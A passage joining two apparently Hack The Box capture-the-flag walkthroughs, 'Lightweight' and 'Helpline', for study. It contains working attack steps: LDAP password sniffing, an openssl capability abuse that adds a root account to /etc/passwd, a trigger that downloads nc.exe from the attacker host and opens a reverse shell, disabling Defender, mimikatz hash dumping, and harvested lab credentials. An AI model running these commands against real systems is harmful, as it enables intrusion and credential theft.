| objectClass: shadowAccount
| userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
| shadowLastChange: 17691
| shadowMin: 0
| shadowMax: 99999
| shadowWarning: 7
| loginShell: /bin/bash
| uidNumber: 1000
| gidNumber: 1000
| homeDirectory: /home/ldapuser1
| dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
| uid: ldapuser2
| cn: ldapuser2
| sn: ldapuser2
| mail: ldapuser2@lightweight.htb
| objectClass: person
| objectClass: organizationalPerson
| objectClass: inetOrgPerson
| objectClass: posixAccount
| objectClass: top
| objectClass: shadowAccount
| userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
| shadowLastChange: 17691
| shadowMin: 0
| shadowMax: 99999
| shadowWarning: 7
| loginShell: /bin/bash
| uidNumber: 1001
| gidNumber: 1001
| homeDirectory: /home/ldapuser2
| dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: ldapuser1
| userPassword: {crypt}x
| gidNumber: 1000
| dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: ldapuser2
| userPassword: {crypt}x
|_ gidNumber: 1001

Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds

 

Since we know that http service was running on port 80 therefore, we navigate to a web browser and browse target IP and welcome by following page where we saw “This site is protected by against brute forcing ” that mean fail2ban could be running inside VM moreover we found three hyperlinks.

When I opened the user.php hyperlink I read the highlighted text and according to this text, a user in the machine has been automatically added for us.

Exploiting

Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flag, therefore, I thought to identify the binary capability files with the help of getcap and saw the fruitful result.

root@kali:~/htb# ssh 10.10.14.7@lightweight.htb
10.10.14.7@lightweight.htb's password:10.10.14.7
[10.10.14.7@lightweight ~]$ id
uid=1003(10.10.14.7) gid=1003(10.10.14.7) groups=1003(10.10.14.7) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[10.10.14.7@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
tcpdump -i any -X port ldap

As result, we observe the following traffic, as predicted, where I found the ldapuser2 password in plaintext.

[10.10.14.7@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
08:04:48.987956 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [S], seq 4215069383, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 0,nop,wscale 6], length 0
0x0000: 4500 003c 6a21 4000 4006 a799 0a0a 0a77 E..<j!@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac7 0000 0000 ...w.....<......
0x0020: a002 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0000 0000 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.987983 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [S.], seq 3703358360, ack 4215069384, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 372966,nop,wscale 6], length 0
0x0000: 4500 003c 0000 4000 4006 11bb 0a0a 0a77 E..<..@.@......w
0x0010: 0a0a 0a77 0185 e8fe dcbc c398 fb3c dac8 ...w.........<..
0x0020: a012 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0005 b0e6 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.988003 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 6a22 4000 4006 a7a0 0a0a 0a77 E..4j"@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.988062 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 91
0x0000: 4500 008f 6a23 4000 4006 a744 0a0a 0a77 E...j#@.@..D...w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8018 02ab 2983 0000 0101 080a 0005 b0e6 ....)...........
0x0030: 0005 b0e6 3059 0201 0160 5402 0103 042d ....0Y...`T....-
0x0040: 7569 643d 6c64 6170 7573 6572 322c 6f75 uid=ldapuser2,ou
0x0050: 3d50 656f 706c 652c 6463 3d6c 6967 6874 =People,dc=light
0x0060: 7765 6967 6874 2c64 633d 6874 6280 2038 weight,dc=htb..8
0x0070: 6263 3832 3531 3333 3261 6265 3164 3766 bc8251332abe1d7f
0x0080: 3130 3564 3365 3533 6164 3339 6163 3200 105d3e53ad39ac2.
0x0090: 0000 0000 0000 0000 0000 0000 0000 00 ...............
08:04:48.988069 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [.], ack 92, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 737f 4000 4006 9e43 0a0a 0a77 E..4s.@.@..C...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.997887 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [P.], seq 1:15, ack 92, win 683, options [nop,nop,TS val 372976 ecr 372966], length 14
0x0000: 4500 0042 7380 4000 4006 9e34 0a0a 0a77 E..Bs.@.@..4...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8018 02ab 2936 0000 0101 080a 0005 b0f0 ....)6..........
0x0030: 0005 b0e6 300c 0201 0161 070a 0100 0400 ....0....a......
0x0040: 0400 0000 0000 0000 0000 0000 0000 0000 ................
0x0050: 0000 ..
08:04:48.997899 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 15, win 683, options [nop,nop,TS val 372976 ecr 372976], length 0
0x0000: 4500 0034 6a24 4000 4006 a79e 0a0a 0a77 E..4j$@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0f0 ....)(..........
0x0030: 0005 b0f0 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:49.001674 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 92:99, ack 15, win 683, options [nop,nop,TS val 372980 ecr 372976], length 7
0x0000: 4500 003b 6a25 4000 4006 a796 0a0a 0a77 E..;j%@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8018 02ab 292f 0000 0101 080a 0005 b0f4 ....)/..........
0x0030: 0005 b0f0 3005 0201 0242 0006 0000 0000 ....0....B......
0x0040: 0000 0000 0000 0000 0000 00 ...........
^C
8 packets captured
44 packets received by filter
28 packets dropped by kernel

Then we switch the user with the following credential and obtain our first flag user.txt

Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
10.10.14.7@lightweight ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.7]$ pwd
/home/10.10.14.7
[ldapuser2@lightweight 10.10.14.7]$ cd ..
[ldapuser2@lightweight home]$ ls
10.10.14.2 10.10.14.7 ldapuser1 ldapuser2
[ldapuser2@lightweight home]$ cd ldapuser2
[ldapuser2@lightweight ~]$ ls
backup.7z OpenLDAP-Admin-Guide.pdf OpenLdap.pdf user.txt
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3bb7e13a57aaeb110297f48026

Privilege Escalation

Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection, we need to transfer this file mine in our local machine.

[ldapuser2@lightweight ~]$ cat backup.7z | base64
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpB
lJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVu
--snip--
3sgjI
hYusiF1vL3ojt9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7X
WwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA

So, I copied it in our machine and try to extract the file, but it was password protected.

I used below to crack the file

And use the “delete” password to extract the directory. I found some php files here and we looked for a status.php file among those files.

root@kali:~/htb/lightweight# 7z e backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Pentium(R) CPU 4415U @ 2.30GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):
Everything is Ok

Files: 5
Size: 10270
Compressed: 3411
root@kali:~/htb/lightweight# ls
backup.7z backup.7z.b64 index.php info.php reset.php status.php user.php

The status.php file reveals the password of ldapuser1 as shown below.

root@kali:~/htb/lightweight# cat status.php | grep user
$username = 'ldapuser1';
//$ldapconfig['usersdn'] = 'cn=users';
$dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<p><br><br><a href="index.php">home</a>&nbsp;&nbsp;<a href="info.php">info</a>&nbsp;&nbsp;<a href="status.php">status</a>&nbsp;&nbsp;<a href="user.php">user</a></p>
root@kali:~/htb/lightweight# cat status.php | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {

Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1

[ldapuser2@lightweight ~]$ su ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d
[ldapuser1@lightweight ldapuser2]$ pwd
/home/ldapuser2
[ldapuser1@lightweight /]$ cd /home/ldapuser1
[ldapuser1@lightweight ~]$ ls -la
total 1496
drwx------. 4 ldapuser1 ldapuser1 181 Jun 15 2018 .
drwxr-xr-x. 6 root root 76 Sep 6 07:57 ..
-rw-------. 1 ldapuser1 ldapuser1 0 Jun 21 2018 .bash_history
-rw-r--r--. 1 ldapuser1 ldapuser1 18 Apr 11 2018 .bash_logout
-rw-r--r--. 1 ldapuser1 ldapuser1 193 Apr 11 2018 .bash_profile
-rw-r--r--. 1 ldapuser1 ldapuser1 246 Jun 15 2018 .bashrc
drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .cache
-rw-rw-r--. 1 ldapuser1 ldapuser1 9714 Jun 15 2018 capture.pcap
drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .config
-rw-rw-r--. 1 ldapuser1 ldapuser1 646 Jun 15 2018 ldapTLS.php
-rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13 2018 openssl
-rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13 2018 tcpdump
[ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
[ldapuser1@lightweight ~]$ ./openssl base64 -a -in /root/root.txt | base64 -d
f1d4e309c5a6b3fffff74a8f4b2135fa

This time once again I checked for file capacity where I saw OpenSSL has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through OpenSSL.

We can also get a root shell by overwriting /etc/passwd . I got a copy of the original passwd file first : ./openssl enc -base64 -in /etc/passwd -out ./passwd.b64

[ldapuser1@lightweight ~]$ base64 -d passwd.b64 > passwd
[ldapuser1@lightweight ~]$ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> passwd
[ldapuser1@lightweight ~]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
--snip--
tcpdump:x:72:72::/:/sbin/nologin
ldap:x:55:55:OpenLDAP server:/var/lib/ldap:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
10.10.14.7:x:1003:1003::/home/10.10.14.7:/bin/bash
toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
[ldapuser1@lightweight ~]$ ./openssl enc -in passwd -out /etc/passwd
[ldapuser1@lightweight ~]$ su toor1
Password: foo
[root@lightweight ldapuser1]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

credits to : https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/

Author: Jacco Straathof

HTB – Helpline

The first shell I got on this box was as nt authority/system which means that I technically rooted the box. But the flags were EFS encrypted so I had to find a way to read them. It’s a Windows box and its ip is 10.10.10.152, I added it to /etc/hosts as helpline.htb.


Nmap

As always we will start with nmap to scan for open ports and services :

root@kali:~/htb/helpline# nmap -sV -sT -sC 10.10.10.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 09:28 EDT
Nmap scan report for 10.10.10.132
Host is up (0.046s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
8080/tcp open http-proxy -
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Set-Cookie: JSESSIONID=606C1FDF44C79201E2AB5302D51C6154; Path=/; HttpOnly
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 01:00:00 GMT
| Content-Type: text/html;charset=UTF-8
| Vary: Accept-Encoding
| Date: Thu, 05 Sep 2019 13:27:56 GMT
| Connection: close
| Server: -
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="X-UA-Compatible" content="IE=Edge">
| <script language='JavaScript' type="text/javascript" src='/scripts/Login.js?9309'></script>
| <script language='JavaScript' type="text/javascript" src='/scripts/jquery-1.8.3.min.js'></script>
| <link href="/style/loginstyle.css?9309" type="text/css" rel="stylesheet"/>
| <link href="/style/new-classes.css?9309" type="text/css" rel="stylesheet">
| <link href="/style/new-classes-sdp.css?9309" type="text/css" rel="stylesheet">
| <link href="/style/conflict-fix.css?9309" type="text/css" rel="stylesheet">
| HTTPOptions: 
| HTTP/1.1 200 OK
| Set-Cookie: JSESSIONID=8606E78ACB1C1EB0C51362E6078F4108; Path=/; HttpOnly
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 01:00:00 GMT
| Content-Type: text/html;charset=UTF-8
| Vary: Accept-Encoding
| Date: Thu, 05 Sep 2019 13:27:58 GMT
| Connection: close
| Server: -
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="X-UA-Compatible" content="IE=Edge">
| <script language='JavaScript' type="text/javascript" src='/scripts/Login.js?9309'></script>
| <script language='JavaScript' type="text/javascript" src='/scripts/jquery-1.8.3.min.js'></script>
| <link href="/style/loginstyle.css?9309" type="text/css" rel="stylesheet"/>
| <link href="/style/new-classes.css?9309" type="text/css" rel="stylesheet">
| <link href="/style/new-classes-sdp.css?9309" type="text/css" rel="stylesheet">
|_ <link href="/style/conflict-fix.css?9309" type="text/css" rel="stylesheet">
|_http-server-header: -
|_http-title: ManageEngine ServiceDesk Plus
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=9/5%Time=5D710D84%P=x86_64-pc-linux-gnu%r(Get
SF:Request,25D6,"HTTP/1\.1\x20200\x20OK\r\nSet-Cookie:\x20JSESSIONID=606C1
SF:FDF44C79201E2AB5302D51C6154;\x20Path=/;\x20HttpOnly\r\nCache-Control:\x
SF:20private\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2001:00:00\x20GMT\r
SF:\nContent-Type:\x20text/html;charset=UTF-8\r\nVary:\x20Accept-Encoding\
SF:r\nDate:\x20Thu,\x2005\x20Sep\x202019\x2013:27:56\x20GMT\r\nConnection:
SF:\x20close\r\nServer:\x20-\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n<m
SF:eta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\n\n\n\r
SF:\n\n\x20\x20\x20\x20<script\x20language='JavaScript'\x20type=\"text/jav
SF:ascript\"\x20src='/scripts/Login\.js\?9309'></script>\n\x20\x20\x20\x20
SF:<script\x20language='JavaScript'\x20type=\"text/javascript\"\x20src='/s
SF:cripts/jquery-1\.8\.3\.min\.js'></script>\n\x20\x20\x20\x20\n\x20\x20\x
SF:20\x20<link\x20href=\"/style/loginstyle\.css\?9309\"\x20type=\"text/css
SF:\"\x20rel=\"stylesheet\"/>\n\x20\x20\x20\x20<link\x20href=\"/style/new-
SF:classes\.css\?9309\"\x20type=\"text/css\"\x20rel=\"stylesheet\">\n\x20\
SF:x20\x20\x20<link\x20href=\"/style/new-classes-sdp\.css\?9309\"\x20type=
SF:\"text/css\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20<link\x20href=\"/s
SF:tyle/conflict-fix\.css\?9309\"\x20type=\"text/css\"\x20rel=\"stylesheet
SF:\">")%r(HTTPOptions,1534,"HTTP/1\.1\x20200\x20OK\r\nSet-Cookie:\x20JSES
SF:SIONID=8606E78ACB1C1EB0C51362E6078F4108;\x20Path=/;\x20HttpOnly\r\nCach
SF:e-Control:\x20private\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2001:00
SF::00\x20GMT\r\nContent-Type:\x20text/html;charset=UTF-8\r\nVary:\x20Acce
SF:pt-Encoding\r\nDate:\x20Thu,\x2005\x20Sep\x202019\x2013:27:58\x20GMT\r\
SF:nConnection:\x20close\r\nServer:\x20-\r\n\r\n<!DOCTYPE\x20html>\n<html>
SF:\n<head>\n<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\
SF:">\n\n\n\n\r\n\n\x20\x20\x20\x20<script\x20language='JavaScript'\x20typ
SF:e=\"text/javascript\"\x20src='/scripts/Login\.js\?9309'></script>\n\x20
SF:\x20\x20\x20<script\x20language='JavaScript'\x20type=\"text/javascript\
SF:"\x20src='/scripts/jquery-1\.8\.3\.min\.js'></script>\n\x20\x20\x20\x20
SF:\n\x20\x20\x20\x20<link\x20href=\"/style/loginstyle\.css\?9309\"\x20typ
SF:e=\"text/css\"\x20rel=\"stylesheet\"/>\n\x20\x20\x20\x20<link\x20href=\
SF:"/style/new-classes\.css\?9309\"\x20type=\"text/css\"\x20rel=\"styleshe
SF:et\">\n\x20\x20\x20\x20<link\x20href=\"/style/new-classes-sdp\.css\?930
SF:9\"\x20type=\"text/css\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20<link\
SF:x20href=\"/style/conflict-fix\.css\?9309\"\x20type=\"text/css\"\x20rel=
SF:\"stylesheet\">");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -39s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2019-09-05T13:29:35
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.49 seconds

We got http on port 8080 and smb. I tried to list smb shares but I couldn’t authenticate anonymously :

root@kali:~/Desktop/HTB/boxes/helpline# smbclient --list //helpline.htb/ -U ""
Enter WORKGROUP\'s password: 
session setup failed: NT_STATUS_LOGON_FAILURE

HTTP Initial Enumeration, Administrative Access

On the http port there was an application called ManageEngine ServiceDesk Plus
I tried some common credentials like admin:admin and guest:guest which actually worked : 


But as guest my capabilities were limited so I had to elevate to an administrative user.

I used the published exploit that does the same thing automatically  as  user enumeration vulnerability .

i used below (learned from ippsec) to allow curl to go trough burp

root@kali:~/htb/helpline# cat ~/.curlrc 
proxy = http://127.0.0.1:8080


next hit F5 refresh in Browser ( after replacing the 2 cookies  JSESSIONID and JSESSIONSSO ), and the admin tab is displayed !


RCE

I checked the Admin section and Custom Triggers under Helpdesk Customizer caught my attention. 


Description says : “You can define rules to automatically invoke any custom class or script file. The action rules can be applied to a request when it is created, (or received) or edited or both”
I ran a python http server to host nc.exe then I created a trigger that executes :

powershell -command Invoke-WebRequest http://10.10.14.7/nc.exe -OutFile C:\Windows\System32\spool\drivers\color\nc.exe

When a request is created (it must has the word test in the subject). 


Last thing to do is to create a request that runs the trigger : 

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.132 - - [05/Sep/2019 09:40:51] "GET /nc.exe HTTP/1.1" 200 -

I edited the trigger and made it execute :

C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.7 9001

Then I created another request and got a reverse shell as nt authority\system :

root@kali:~/htb# nc -lvp 9001
listening on [any] 9001 ...
10.10.10.132: inverse host lookup failed: Unknown host
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.132] 49743
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

E:\ManageEngine\ServiceDesk\integration\custom_scripts>whoami
whoami
nt authority\system

E:\ManageEngine\ServiceDesk\integration\custom_scripts>

Encrypted Flags

Although I was system I couldn’t read the flags :

E:\ManageEngine\ServiceDesk\integration\custom_scripts>c:                         
c:              
C:\>cd Users                  
cd Users 
C:\Users>cd Administrator           
cd Administrator
C:\Users\Administrator>cd Desktop                 
cd Desktop
C:\Users\Administrator\Desktop>type root.txt                           
type root.txt
Access is denied.
C:\Users>cd tolu
cd tolu

C:\Users\tolu>cd Desktop
cd Desktop

C:\Users\tolu\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of C:\Users\tolu\Desktop

12/29/2018  10:21 PM    <DIR>          .
12/29/2018  10:21 PM    <DIR>          ..
12/21/2018  12:12 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   5,851,750,400 bytes free

C:\Users\tolu\Desktop>type user.txt
type user.txt
Access is denied.

That’s because the flags are EFS encrypted :

C:\Users\Administrator\Desktop>cipher /c root.txt
cipher /c root.txt

 Listing C:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.


C:\Users\Administrator\Desktop>cipher /c ../../tolu/Desktop/user.txt
cipher /c ../../tolu/Desktop/user.txt

 Listing C:\Users\tolu\Desktop\
 New files added to this directory will not be encrypted.

E user.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\tolu [tolu(tolu@HELPLINE)]
    Certificate thumbprint: 91EF 5D08 D1F7 C60A A0E4 CEE7 3E05 0639 A669 2F29 

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.


C:\Users\Administrator\Desktop>

To decrypt them we need Administrator’s password for root.txt and tolu’s password for user.txt. First time I solved this box I got the root flag first as it was easier but for the write-up I’ll do user flag first.


user.txt

Since we need passwords, first thing I did was to put mimikatz on the box and dump the password hashes.
But before that I had to disable :

PS C:\Users\Administrator\Desktop> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\Users\Administrator\Desktop> 
PS C:\windows\system32\spool\drivers\color> Invoke-WebRequest http://10.10.xx.xx/mimikatz.exe -OutFile mimikatz.exe
Invoke-WebRequest http://10.10.xx.xx/mimikatz.exe -OutFile mimikatz.exe
PS C:\windows\system32\spool\drivers\color> dir
dir


    Directory: C:\windows\system32\spool\drivers\color
    
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2018   8:12 AM           1058 D50.camp
-a----        9/15/2018   8:12 AM           1079 D65.camp
-a----        9/15/2018   8:12 AM            797 Graphics.gmmp
-a----        9/15/2018   8:12 AM            838 MediaSim.gmmp
-a----        8/16/2019   1:24 PM        1006744 mimikatz.exe
-a----        8/16/2019   1:47 PM          38616 nc.exe
-a----        9/15/2018   8:12 AM            786 Photo.gmmp
-a----        9/15/2018   8:12 AM            822 Proofing.gmmp
-a----        9/15/2018   8:12 AM         218103 RSWOP.icm
-a----        9/15/2018   8:12 AM           3144 sRGB Color Space Profile.icm
-a----        9/15/2018   8:12 AM          17155 wscRGB.cdmp
-a----        9/15/2018   8:12 AM           1578 wsRGB.cdmp

PS C:\windows\system32\spool\drivers\color> 
mimikatz # lsadump::sam
Domain : HELPLINE
SysKey : f684313986dcdab719c2950661809893
Local SID : S-1-5-21-3107372852-1132949149-763516304

SAMKey : 9db624e549009762ee47528b9aa6ed34

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: d5312b245d641b3fae0d07493a022622

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 52a344a6229f7bfa074d3052023f0b41

RID  : 000003e8 (1000)
User : alice
  Hash NTLM: 998a9de69e883618e987080249d20253

RID  : 000003ef (1007)
User : zachary
  Hash NTLM: eef285f4c800bcd1ae1e84c371eeb282

RID  : 000003f1 (1009)
User : leo
  Hash NTLM: 60b05a66232e2eb067b973c889b615dd

RID  : 000003f2 (1010)
User : niels
  Hash NTLM: 35a9de42e66dcdd5d512a796d03aef50

RID  : 000003f3 (1011)
User : tolu
  Hash NTLM: 03e2ec7aa7e82e479be07ecd34f1603b

The only crackable hash was zachary’s : 
But what can we do with zachary ?

PS C:\windows\system32\spool\drivers\color> net users zachary
net users zachary
User name                    zachary
Full Name                    zachary
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/21/2018 10:25:34 PM
Password expires             Never
Password changeable          12/21/2018 10:25:34 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   8/16/2019 1:37:32 PM

Logon hours allowed          All

Local Group Memberships      *Event Log Readers    *Users
Global Group memberships     *None
The command completed successfully.

zachary is a member of a local group called Event Log Readers, maybe there is something in the event log, I queried the event log with wevtutil and saved the output in a file :

C:\Windows\System32\spool\drivers\color>wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321 > eventlog.txt                                                                        
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321 > eventlog.txt

C:\Windows\System32\spool\drivers\color>

The output was a very long one so I searched for interesting stuff like usernames, by searching for tolu I got this net use command which had tolu's password :

C:\Windows\System32\spool\drivers\color>type eventlog.txt | findstr tolu                                                                   
type eventlog.txt | findstr tolu                                                                                                           
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                                       
        Account Name:           tolu                                                                                   
        Account Name:           tolu                                                                                   
        Account Name:           tolu                                                                                   
        Account Name:           tolu
    ----------------
     Removed Output
    ----------------
Process Command Line:   "C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99                                                                                           
        Account Name:           tolu
Logon Account:  tolu
        Account Name:           tolu
        Process Command Line:   "C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99                                                                                     
        Account Name:           tolu
        Account Name:           tolu

tolu : !zaq1234567890pl!99
tolu is in the Remote Management Users local group :

C:\Windows\System32\spool\drivers\color>net users tolu
net users tolu
User name                    tolu
Full Name                    tolu
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/28/2018 10:52:52 PM
Password expires             Never
Password changeable          12/28/2018 10:52:52 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
